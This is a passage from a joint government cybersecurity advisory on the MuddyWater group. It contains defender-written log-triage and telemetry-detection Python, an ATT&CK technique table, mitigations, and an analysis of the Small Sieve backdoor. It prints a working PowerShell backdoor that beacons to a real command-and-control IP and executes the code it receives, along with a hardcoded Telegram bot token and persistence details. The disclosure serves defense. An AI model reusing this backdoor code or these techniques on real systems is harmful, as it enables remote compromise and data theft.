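    Raises ValueError when the input is not Base64 or not UTF-8 after XOR."""
    try:
        raw = base64.b64decode(b64_text, validate=True)
        return xor_bytes(raw, key).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError) as exc:
        raise ValueError(f"not a key-0x{key:02x} channel payload") from exc


def encode_channel(text: str, key: int = XOR_KEY) -> str:
    """Same transform as the sample's encode(); used here only to build fixtures."""
    return base64.b64encode(xor_bytes(text.encode("utf-8"), key)).decode("ascii")


def parse_survey(text: str) -> Optional[dict]:
    """Split a ';;'-delimited survey string into named fields; None if the shape differs."""
    parts = text.split(SURVEY_DELIM)
    if len(parts) != len(SURVEY_FIELDS):
        return None
    rec = dict(zip(SURVEY_FIELDS, parts))
    # the survey script emits ", ip1, ip2" minus its first character, so strip each entry
    rec["ips"] = [ip.strip() for ip in rec["ips"].split(",") if ip.strip()]
    return rec


# Constructed proxy-log line format: "<time> <src> <method> <url> [cookie=<value>]"
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\S+) (?P<method>GET|POST) (?P<url>\S+)(?: cookie=(?P<cookie>\S+))?$"
)
BEACON_PATH = "/index.php?id="   # URL shape used by the sample backdoor


def triage(lines: List[str]) -> List[dict]:
    """One record per request matching the beacon URL shape; any cookie payload is
    decoded and, where it has the survey shape, broken into named fields."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m or BEACON_PATH not in m["url"]:
            continue
        rec = {"ts": m["ts"], "src": m["src"], "url": m["url"],
               "decoded": None, "survey": None, "note": ""}
        if m["cookie"]:
            try:
                rec["decoded"] = decode_channel(m["cookie"])
                rec["survey"] = parse_survey(rec["decoded"])
            except ValueError as exc:
                rec["note"] = str(exc)
        hits.append(rec)
    return hits


# Constructed sample log (TEST-NET-2 address, invented host and user names)
SAMPLE_LOG = [
    # beacon poll with no result yet
    "2022-02-24T10:00:01Z 10.0.0.15 GET http://198.51.100.7/index.php?id=HOST01",
    # unrelated traffic; must not be reported
    "2022-02-24T10:00:02Z 10.0.0.15 GET http://intranet.example/index.html",
    # cookie carrying the constructed result text "whoami" encoded with key 0x02
    "2022-02-24T10:00:21Z 10.0.0.15 GET http://198.51.100.7/index.php?id=HOST01 cookie=dWptY29r",
    # cookie carrying a survey string in the ';;' format
    "2022-02-24T10:00:41Z 10.0.0.15 GET http://198.51.100.7/index.php?id=HOST01 cookie="
    + encode_channel("Microsoft Windows 10 Pro;; 10.0.0.15;;64-bit;;ws01.corp.example;;corp.example;;jdoe;;Windows Defender"),
    # cookie that is not Base64 at all
    "2022-02-24T10:01:01Z 10.0.0.15 GET http://198.51.100.7/index.php?id=HOST01 cookie=not-base64!",
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_LOG):
        print(hit["ts"], hit["src"], hit["decoded"] if hit["decoded"] is not None else hit["note"])
```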
The script is lightweight in functionality and uses the InvokeScript method to execute responses received from the adversary.

```powershell
# XOR each byte with $key (the sample passes 2), then Base64-encode
function encode($txt, $key) {
    $enByte = [Text.Encoding]::UTF8.GetBytes($txt)
    for ($i = 0; $i -lt $enByte.count; $i++) { $enByte[$i] = $enByte[$i] -bxor $key }
    $encodetxt = [Convert]::ToBase64String($enByte)
    return $encodetxt
}
# Base64-decode, then XOR each byte with $key
function decode($txt, $key) {
    $enByte = [System.Convert]::FromBase64String($txt)
    for ($i = 0; $i -lt $enByte.count; $i++) { $enByte[$i] = $enByte[$i] -bxor $key }
    $dtxt = [System.Text.Encoding]::UTF8.GetString($enByte)
    return $dtxt
}
$global:tt = 20   # beacon interval in seconds
while ($true) {
    try {
        # Poll the C2 for tasking through the system proxy
        $w = [System.Net.HttpWebRequest]::Create('http://95.181.161.49:80/index.php?id=<victim identifier>')
        $w.proxy = [Net.WebRequest]::GetSystemWebProxy()
        $r = (New-Object System.IO.StreamReader($w.GetResponse().GetResponseStream())).ReadToEnd()
        if ($r.Length -gt 0) {
            # Decode the response and run it as PowerShell; send the result back encoded in a 'cookie' header
            $res = [string]$ExecutionContext.InvokeCommand.InvokeScript((decode $r 2))
            $wr = [System.Net.HttpWebRequest]::Create('http://95.181.161.49:80/index.php?id=<victim identifier>')
            $wr.proxy = [Net.WebRequest]::GetSystemWebProxy()
            $wr.Headers.Add('cookie', (encode $res 2))
            $wr.GetResponse().GetResponseStream()
        }
    } catch {}
    Start-Sleep -Seconds $global:tt
}
```

### MITRE ATT&CK Techniques

[MuddyWater](<https://attack.mitre.org/groups/G0069/>) uses the ATT&CK techniques listed in table 1.

_Table 1: MuddyWater ATT&CK Techniques[[2](<https://attack.mitre.org/versions/v10/groups/G0069/>)]_

**Technique Title** | **ID** | **Use**
---|---|---
**Reconnaissance** | |
Gather Victim Identity Information: Email Addresses | [T1589.002](<https://attack.mitre.org/versions/v10/techniques/T1589/002>) | MuddyWater has specifically targeted government agency employees with spearphishing emails.
**Resource Development** | |
Acquire Infrastructure: Web Services | [T1583.006](<https://attack.mitre.org/versions/v10/techniques/T1583/006/>) | MuddyWater has used file sharing services including OneHub to distribute tools.
Obtain Capabilities: Tool | [T1588.002](<https://attack.mitre.org/versions/v10/techniques/T1588/002>) | MuddyWater has made use of legitimate tools ConnectWise and RemoteUtilities for access to target environments.
**Initial Access** | |
Phishing: Spearphishing Attachment | [T1566.001](<https://attack.mitre.org/versions/v10/techniques/T1566/001>) | MuddyWater has compromised third parties and used compromised accounts to send spearphishing emails with targeted attachments.
Phishing: Spearphishing Link | [T1566.002](<https://attack.mitre.org/versions/v10/techniques/T1566/002>) | MuddyWater has sent targeted spearphishing emails with malicious links.
**Execution** | |
Windows Management Instrumentation | [T1047](<https://attack.mitre.org/versions/v10/techniques/T1047>) | MuddyWater has used malware that leveraged Windows Management Instrumentation for execution and querying host information.
Command and Scripting Interpreter: PowerShell | [T1059.001](<https://attack.mitre.org/versions/v10/techniques/T1059/001/>) | MuddyWater has used PowerShell for execution.
Command and Scripting Interpreter: Windows Command Shell | [T1059.003](<https://attack.mitre.org/versions/v10/techniques/T1059/003>) | MuddyWater has used a custom tool for creating reverse shells.
Command and Scripting Interpreter: Visual Basic | [T1059.005](<https://attack.mitre.org/versions/v10/techniques/T1059/005>) | MuddyWater has used Visual Basic Script (VBS) files to execute its POWERSTATS payload, as well as macros.
Command and Scripting Interpreter: Python | [T1059.006](<https://attack.mitre.org/versions/v10/techniques/T1059/006>) | MuddyWater has used tools developed in Python, including Out1.
Command and Scripting Interpreter: JavaScript | [T1059.007](<https://attack.mitre.org/versions/v10/techniques/T1059/007>) | MuddyWater has used JavaScript files to execute its POWERSTATS payload.
Exploitation for Client Execution | [T1203](<https://attack.mitre.org/versions/v10/techniques/T1203>) | MuddyWater has exploited the Office vulnerability CVE-2017-0199 for execution.
User Execution: Malicious Link | [T1204.001](<https://attack.mitre.org/versions/v10/techniques/T1204/001>) | MuddyWater has distributed URLs in phishing emails that link to lure documents.
User Execution: Malicious File | [T1204.002](<https://attack.mitre.org/versions/v10/techniques/T1204/002>) | MuddyWater has attempted to get users to enable macros and launch malicious Microsoft Word documents delivered via spearphishing emails.
Inter-Process Communication: Component Object Model | [T1559.001](<https://attack.mitre.org/versions/v10/techniques/T1559/001>) | MuddyWater has used malware that has the capability to execute malicious code via COM, DCOM, and Outlook.
Inter-Process Communication: Dynamic Data Exchange | [T1559.002](<https://attack.mitre.org/versions/v10/techniques/T1559/002>) | MuddyWater has used malware that can execute PowerShell scripts via Dynamic Data Exchange.
**Persistence** | |
Scheduled Task/Job: Scheduled Task | [T1053.005](<https://attack.mitre.org/versions/v10/techniques/T1053/005>) | MuddyWater has used scheduled tasks to establish persistence.
Office Application Startup: Office Template Macros | [T1137.001](<https://attack.mitre.org/versions/v10/techniques/T1137/001>) | MuddyWater has used a Word Template, `Normal.dotm`, for persistence.
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | [T1547.001](<https://attack.mitre.org/versions/v10/techniques/T1547/001/>) | MuddyWater has added the Registry Run key `HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SystemTextEncoding` to establish persistence.
**Privilege Escalation** | |
Abuse Elevation Control Mechanism: Bypass User Account Control | [T1548.002](<https://attack.mitre.org/versions/v10/techniques/T1548/002/>) | MuddyWater uses various techniques to bypass user account control.
Credentials from Password Stores | [T1555](<https://attack.mitre.org/versions/v10/techniques/T1555>) | MuddyWater has performed credential dumping with LaZagne and other tools, including by dumping passwords saved in victim email.
Credentials from Web Browsers | [T1555.003](<https://attack.mitre.org/versions/v10/techniques/T1555/003>) | MuddyWater has run tools including Browser64 to steal passwords saved in victim web browsers.
**Defense Evasion** | |
Obfuscated Files or Information | [T1027](<https://attack.mitre.org/versions/v10/techniques/T1027>) | MuddyWater has used Daniel Bohannon’s Invoke-Obfuscation framework and obfuscated PowerShell scripts. The group has also used other obfuscation methods, including Base64 obfuscation of VBScripts and PowerShell commands.
Steganography | [T1027.003](<https://attack.mitre.org/versions/v10/techniques/T1027/003>) | MuddyWater has stored obfuscated JavaScript code in an image file named `temp.jpg`.
Compile After Delivery | [T1027.004](<https://attack.mitre.org/versions/v10/techniques/T1027/004>) | MuddyWater has used the .NET `csc.exe` tool to compile executables from downloaded C# code.
Masquerading: Match Legitimate Name or Location | [T1036.005](<https://attack.mitre.org/versions/v10/techniques/T1036/005>) | MuddyWater has disguised malicious executables and used filenames and Registry key names associated with Windows Defender. For example, Small Sieve uses variations of Microsoft (Microsift) and Outlook in its filenames to attempt to avoid detection during casual inspection.
Deobfuscate/Decode Files or Information | [T1140](<https://attack.mitre.org/versions/v10/techniques/T1140>) | MuddyWater decoded Base64-encoded PowerShell commands using a VBS file.
Signed Binary Proxy Execution: CMSTP | [T1218.003](<https://attack.mitre.org/versions/v10/techniques/T1218/003>) | MuddyWater has used `CMSTP.exe` and a malicious `.INF` file to execute its POWERSTATS payload.
Signed Binary Proxy Execution: Mshta | [T1218.005](<https://attack.mitre.org/versions/v10/techniques/T1218/005>) | MuddyWater has used `mshta.exe` to execute its POWERSTATS payload and to pass a PowerShell one-liner for execution.
Signed Binary Proxy Execution: Rundll32 | [T1218.011](<https://attack.mitre.org/versions/v10/techniques/T1218/011>) | MuddyWater has used malware that leveraged `rundll32.exe` in a Registry Run key to execute a `.dll`.
Execution Guardrails | [T1480](<https://attack.mitre.org/versions/v10/techniques/T1480/>) | The Small Sieve payload used by MuddyWater will only execute correctly if the word “Platypus” is passed to it on the command line.
Impair Defenses: Disable or Modify Tools | [T1562.001](<https://attack.mitre.org/versions/v10/techniques/T1562/001>) | MuddyWater can disable the system's local proxy settings.
**Credential Access** | |
OS Credential Dumping: LSASS Memory | [T1003.001](<https://attack.mitre.org/versions/v10/techniques/T1003/001>) | MuddyWater has performed credential dumping with Mimikatz and `procdump64.exe`.
OS Credential Dumping: LSA Secrets | [T1003.004](<https://attack.mitre.org/versions/v10/techniques/T1003/004>) | MuddyWater has performed credential dumping with LaZagne.
OS Credential Dumping: Cached Domain Credentials | [T1003.005](<https://attack.mitre.org/versions/v10/techniques/T1003/005>) | MuddyWater has performed credential dumping with LaZagne.
Unsecured Credentials: Credentials In Files | [T1552.001](<https://attack.mitre.org/versions/v10/techniques/T1552/001>) | MuddyWater has run a tool that steals passwords saved in victim email.
\n**Discovery** \nSystem Network Configuration Discovery | [T1016](<https://attack.mitre.org/versions/v10/techniques/T1016>) | MuddyWater has used malware to collect the victim\u2019s IP address and domain name. \nSystem Owner/User Discovery | [T1033](<https://attack.mitre.org/versions/v10/techniques/T1033>) | MuddyWater has used malware that can collect the victim\u2019s username. \nSystem Network Connections Discovery | [T1049](<https://attack.mitre.org/versions/v10/techniques/T1049>) | MuddyWater has used a PowerShell backdoor to check for Skype connections on the target machine. \nProcess Discovery | [T1057](<https://attack.mitre.org/versions/v10/techniques/T1057>) | MuddyWater has used malware to obtain a list of running processes on the system. \nSystem Information Discovery | \n\n[T1082](<https://attack.mitre.org/versions/v10/techniques/T1082>)\n\n| MuddyWater has used malware that can collect the victim\u2019s OS version and machine name. \nFile and Directory Discovery | [T1083](<https://attack.mitre.org/versions/v10/techniques/T1083>) | MuddyWater has used malware that checked if the ProgramData folder had folders or files with the keywords \"Kasper,\" \"Panda,\" or \"ESET.\" \nAccount Discovery: Domain Account | [T1087.002](<https://attack.mitre.org/versions/v10/techniques/T1087/002/>) | MuddyWater has used `cmd.exe` net user/domain to enumerate domain users. \nSoftware Discovery | [T1518](<https://attack.mitre.org/versions/v10/techniques/T1518>) | MuddyWater has used a PowerShell backdoor to check for Skype connectivity on the target machine. \nSecurity Software Discovery | [T1518.001](<https://attack.mitre.org/versions/v10/techniques/T1518/001>) | MuddyWater has used malware to check running processes against a hard-coded list of security tools often used by malware researchers. 
\n**Collection** \nScreen Capture | [T1113](<https://attack.mitre.org/versions/v10/techniques/T1113>) | MuddyWater has used malware that can capture screenshots of the victim\u2019s machine. \n \nArchive Collected Data: Archive via Utility\n\n| [T1560.001](<https://attack.mitre.org/versions/v10/techniques/T1560/001/>) | MuddyWater has used the native Windows cabinet creation tool, `makecab.exe`, likely to compress stolen data to be uploaded. \n**Command and Control** \nApplication Layer Protocol: Web Protocols | [T1071.001](<https://attack.mitre.org/versions/v10/techniques/T1071/001/>) | MuddyWater has used HTTP for C2 communications. e.g., Small Sieve beacons and tasking are performed using the Telegram API over HTTPS. \nProxy: External Proxy | [T1090.002](<https://attack.mitre.org/versions/v10/techniques/T1090/002>) | \n\nMuddyWater has controlled POWERSTATS from behind a proxy network to obfuscate the C2 location. \n\nMuddyWater has used a series of compromised websites that victims connected to randomly to relay information to C2. \n \nWeb Service: Bidirectional Communication | [T1102.002](<https://attack.mitre.org/versions/v10/techniques/T1102/002>) | MuddyWater has used web services including OneHub to distribute remote access tools. \nMulti-Stage Channels | [T1104](<https://attack.mitre.org/versions/v10/techniques/T1104>) | MuddyWater has used one C2 to obtain enumeration scripts and monitor web logs, but a different C2 to send data back. \nIngress Tool Transfer | [T1105](<https://attack.mitre.org/versions/v10/techniques/T1105>) | MuddyWater has used malware that can upload additional files to the victim\u2019s machine. \nData Encoding: Standard Encoding | [T1132.001](<https://attack.mitre.org/versions/v10/techniques/T1132/001/>) | MuddyWater has used tools to encode C2 communications including Base64 encoding. 
\nData Encoding: Non-Standard Encoding | [T1132.002](<https://attack.mitre.org/versions/v10/techniques/T1132/002/>) | MuddyWater uses tools such as Small Sieve, which employs a custom hex byte swapping encoding scheme to obfuscate tasking traffic. \nRemote Access Software | [T1219](<https://attack.mitre.org/versions/v10/techniques/T1219>) | MuddyWater has used a legitimate application, ScreenConnect, to manage systems remotely and move laterally. \n**Exfiltration** \nExfiltration Over C2 Channel | [T1041](<https://attack.mitre.org/versions/v10/techniques/T1041>) | MuddyWater has used C2 infrastructure to receive exfiltrated data. \n \n### Mitigations\n\n#### Protective Controls and Architecture\n\n * **Deploy application control software to limit the applications and executable code that can be run by users. **Email attachments and files downloaded via links in emails often contain executable code. \n\n#### Identity and Access Management\n\n * **Use multifactor authentication where possible,** particularly for webmail, virtual private networks, and accounts that access critical systems. \n * **Limit the use of administrator privileges.** Users who browse the internet, use email, and execute code with administrator privileges make for excellent spearphishing targets because their system\u2014once infected\u2014enables attackers to move laterally across the network, gain additional accesses, and access highly sensitive information. \n\n#### Phishing Protection\n\n * **Enable antivirus and anti-malware software and update signature definitions in a timely manner.** Well-maintained antivirus software may prevent use of commonly deployed attacker tools that are delivered via spearphishing. 
* **Be suspicious of unsolicited contact via email or social media from any individual you do not know personally.** Do not click on hyperlinks or open attachments in these communications.
* **Consider adding an email banner to emails received from outside your organization and disabling hyperlinks in received emails.**
* **Train users through awareness and simulations to recognize and report phishing and social engineering attempts.** Identify and suspend access of user accounts exhibiting unusual activity.
* **Adopt threat reputation services at the network device, operating system, application, and email service levels.** Reputation services can be used to detect or prevent low-reputation email addresses, files, URLs, and IP addresses used in spearphishing attacks.

#### Vulnerability and Configuration Management

* **Install updates/patch operating systems, software, and firmware as soon as updates/patches are released.** Prioritize patching [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).

### Additional Resources

* For more information on Iranian government-sponsored malicious cyber activity, see [CISA's webpage – Iran Cyber Threat Overview and Advisories](<https://www.us-cert.cisa.gov/iran>) and [CNMF's press release – Iranian intel cyber suite of malware uses open source tools](<https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/>).
* For information and resources on protecting against and responding to ransomware, refer to [StopRansomware.gov](<https://www.cisa.gov/stopransomware/>), a centralized, whole-of-government webpage providing ransomware resources and alerts.
* The joint advisory from the cybersecurity authorities of Australia, Canada, New Zealand, the United Kingdom, and the United States, [Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-245A-Joint_CSA-Technical_Approaches_to_Uncovering_Malicious_Activity_508.pdf>), provides additional guidance when hunting or investigating a network and common mistakes to avoid in incident handling.
* CISA offers a range of no-cost [cyber hygiene services](<https://www.cisa.gov/cyber-hygiene-services>) to help critical infrastructure organizations assess, identify, and reduce their exposure to threats, including ransomware. By requesting these services, organizations of any size could find ways to reduce their risk and mitigate attack vectors.
* The U.S. Department of State's Rewards for Justice (RFJ) program offers a reward of up to $10 million for reports of foreign government malicious activity against U.S. critical infrastructure. See the [RFJ](<https://rewardsforjustice.net/rewards/foreign-malicious-cyber-activity-against-u-s-critical-infrastructure/>) website for more information and how to report information securely.

### Caveats

The information you have accessed or received is being provided "as is" for informational purposes only.
The FBI, CISA, CNMF, and NSA do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the FBI, CISA, CNMF, or NSA.

### Purpose

This document was developed by the FBI, CISA, CNMF, NCSC-UK, and NSA in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders. The United States' NSA agrees with this attribution and the details provided in this report.

### Appendix A: IOCs

The following IP addresses are associated with MuddyWater activity:

### Appendix B: Small Sieve

**Note:** the information contained in this appendix is from NCSC-UK analysis of a Small Sieve sample.

#### **Metadata**

_Table 2: gram_app.exe Metadata_

| **Filename** | gram_app.exe |
|---|---|
| **Description** | NSIS installer that installs and runs the index.exe backdoor and adds a persistence registry key |
| **Size** | 16999598 bytes |
| **MD5** | 15fa3b32539d7453a9a85958b77d4c95 |
| **SHA-1** | 11d594f3b3cf8525682f6214acb7b7782056d282 |
| **SHA-256** | b75208393fa17c0bcbc1a07857686b8c0d7e0471d00a167a07fd0d52e1fc9054 |
| **Compile Time** | 2021-09-25 21:57:46 UTC |

_Table 3: index.exe Metadata_

| **Filename** | index.exe |
|---|---|
| **Description** | The final PyInstaller-bundled Python 3.9 backdoor |
| **Size** | 17263089 bytes |
| **MD5** | 5763530f25ed0ec08fb26a30c04009f1 |
| **SHA-1** | 2a6ddf89a8366a262b56a251b00aafaed5321992 |
| **SHA-256** | bf090cf7078414c9e157da7002ca727f06053b39fa4e377f9a0050f2af37d3a2 |
| **Compile Time** | 2021-08-01 04:39:46 UTC |

#### **Functionality**

##### **_Installation_**

Small Sieve is distributed as a large (16MB) NSIS installer named `gram_app.exe`, which does not appear to masquerade as a legitimate application. Once executed, the backdoor binary `index.exe` is installed in the user's `AppData/Roaming` directory and is added as a Run key in the registry to enable persistence after reboot.

The installer then executes the backdoor with the "Platypus" argument [[T1480](<https://attack.mitre.org/versions/v10/techniques/T1480/>)], which is also present in the registry persistence key: `HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OutlookMicrosift`.

##### **_Configuration_**

The backdoor attempts to restore previously initialized session data from `%LocalAppData%\MicrosoftWindowsOutlookDataPlus.txt`.

If this file does not exist, it uses the hardcoded values listed in table 4:

_Table 4: Credentials and Session Values_

| Field | **Value** | **Description** |
|---|---|---|
| Chat ID | 2090761833 | This is the Telegram Channel ID to which beacons are sent and from which tasking requests are received. Tasking requests are dropped if they do not come from this channel. This value cannot be changed. |
| Bot ID | Random value between 10,000,000 and 90,000,000 | This is a bot identifier generated at startup that is sent to the C2 in the initial beacon. Commands must be prefixed with `/com[Bot ID]` in order to be processed by the malware. |
| Telegram Token | 2003026094:AAGoitvpcx3SFZ2_6YzIs4La_kyDF1PbXrY | This is the initial token used to authenticate each message to the Telegram Bot API. |
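The installation and configuration artifacts described above (the `OutlookMicrosift` Run key, the `MicrosoftWindowsOutlookDataPlus.txt` session file, `index.exe` launched from `AppData\Roaming` with the literal "Platypus" guardrail argument, and the deliberate "Microsift" misspelling) are host indicators a defender can hunt for in endpoint telemetry. The following Python is an added example, not code from the advisory or from NCSC-UK's analysis; the record shape (`type`, `image`, `cmdline`, `target`) and the sample events are constructed for illustration and do not follow any real EDR schema.

```python
# Added example (not from the advisory): flag Small Sieve host artifacts from
# Appendix B in constructed endpoint telemetry records.
import re
from typing import Dict, List

# Artifacts named in the advisory's Installation / Configuration sections.
RUN_KEY = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OutlookMicrosift"
SESSION_FILE = "MicrosoftWindowsOutlookDataPlus.txt"
GUARDRAIL_ARG = "Platypus"  # execution guardrail (T1480)
BACKDOOR_DIR = "\\appdata\\roaming\\"  # index.exe is dropped under AppData/Roaming
# Small Sieve spells "Microsoft" as "Microsift" in file and key names (T1036.005).
MISSPELLING = re.compile(r"microsift", re.IGNORECASE)

def classify(event: Dict[str, str]) -> List[str]:
    """Return the indicator names one record matches (empty list if none).
    Record shape is constructed for this example, not a real EDR schema:
    type = process|registry|file, image = acting executable,
    cmdline = process command line, target = key or file path touched."""
    hits: List[str] = []
    kind, image = event.get("type", ""), event.get("image", "")
    target = event.get("target", "")
    if kind == "registry" and target.lower() == RUN_KEY.lower():
        hits.append("run_key_OutlookMicrosift")
    if kind == "file" and target.lower().endswith(SESSION_FILE.lower()):
        hits.append("session_file_MicrosoftWindowsOutlookDataPlus")
    if kind == "process":
        # Installer and Run key both start index.exe with the literal "Platypus"
        # token; match it as a whole argument, case-sensitive, not as a substring.
        args = event.get("cmdline", "").split()
        if BACKDOOR_DIR in image.lower() and GUARDRAIL_ARG in args:
            hits.append("guardrail_arg_Platypus")
    if MISSPELLING.search(image) or MISSPELLING.search(target):
        hits.append("microsift_misspelling")
    return hits

def triage(events: List[Dict[str, str]]) -> List[tuple]:
    """Return (event id, matched indicators) for every record with a hit."""
    flagged = []
    for event in events:
        hits = classify(event)
        if hits:
            flagged.append((event["id"], hits))
    return flagged

# Constructed sample telemetry for the demonstration; these are not real logs.
SAMPLE_EVENTS = [
    {"id": "1", "type": "process", "image": r"C:\Users\alice\AppData\Roaming\index.exe",
     "cmdline": "index.exe Platypus", "target": ""},
    {"id": "2", "type": "registry", "image": r"C:\Users\alice\Downloads\gram_app.exe",
     "cmdline": "", "target": RUN_KEY},
    {"id": "3", "type": "file", "image": r"C:\Users\alice\AppData\Roaming\index.exe",
     "cmdline": "", "target": r"C:\Users\alice\AppData\Local\MicrosoftWindowsOutlookDataPlus.txt"},
    {"id": "4", "type": "process", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt", "target": ""},
]

if __name__ == "__main__":
    for event_id, hits in triage(SAMPLE_EVENTS):
        print(f"event {event_id}: {', '.join(hits)}")
```

Only events 1 to 3 are flagged; the benign notepad record and a lowercase "platypus" argument produce no hit, which keeps the guardrail check tied to the exact token the advisory documents.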
#### **Tasking**

Small Sieve beacons via the Telegram Bot API, sending the configured Bot ID, the currently logged-in user, and the host's IP address, as described in the Communications (Beacon format) section below. It then waits for tasking as a Telegram bot using the **python-telegram-bot** module.

Two task formats are supported:

* `/start` – no argument is passed; this causes the beacon information to be repeated.
* `/com[BotID] [command]` – for issuing commands passed in the argument.

The following commands are supported by the second of these formats, as described in table 5:

_Table 5: Supported Commands_

| Command | Description |
|---|---|
| delete | This command causes the backdoor to exit; it does not remove persistence. |
| download **url""filename** | The URL will be fetched and saved to the provided filename using the Python urllib module `urlretrieve` function. |
| change token **""newtoken** | The backdoor will reconnect to the Telegram Bot API using the provided token `newtoken`. This updated token will be stored in the encoded `MicrosoftWindowsOutlookDataPlus.txt` file. |
| disconnect | The original connection to Telegram is terminated. It is likely used after a `change token` command is issued. |

Any commands other than those detailed in table 5 are executed directly by passing them to `cmd.exe /c`, and the output is returned as a reply.

#### **Defense Evasion**

##### **_Anti-Sandbox_**

_Figure 1: Execution Guardrail_

Threat actors may be attempting to thwart simple analysis, since the backdoor does not execute correctly unless "Platypus" is passed on the command line.

##### **_String obfuscation_**

Internal strings and new Telegram tokens are stored obfuscated with a custom alphabet and Base64-encoded. A decryption script is included in Appendix B.

#### **Communications**

##### **_Beacon Format_**

Before listening for tasking using CommandHandler objects from the `python-telegram-bot` module, a beacon is generated manually using the standard `requests` library:

_Figure 2: Manually Generated Beacon_

The hex host data is encoded using the byte shuffling algorithm described in the "Communications (Traffic obfuscation)" section of this report. The example in figure 2 decodes to:

`admin/WINDOMAIN1 | 10.17.32.18`

##### _**Traffic obfuscation**_

Although traffic to the Telegram Bot API is protected by TLS, Small Sieve obfuscates its tasking and response using a hex byte shuffling algorithm. A Python3 implementation is shown in figure 3.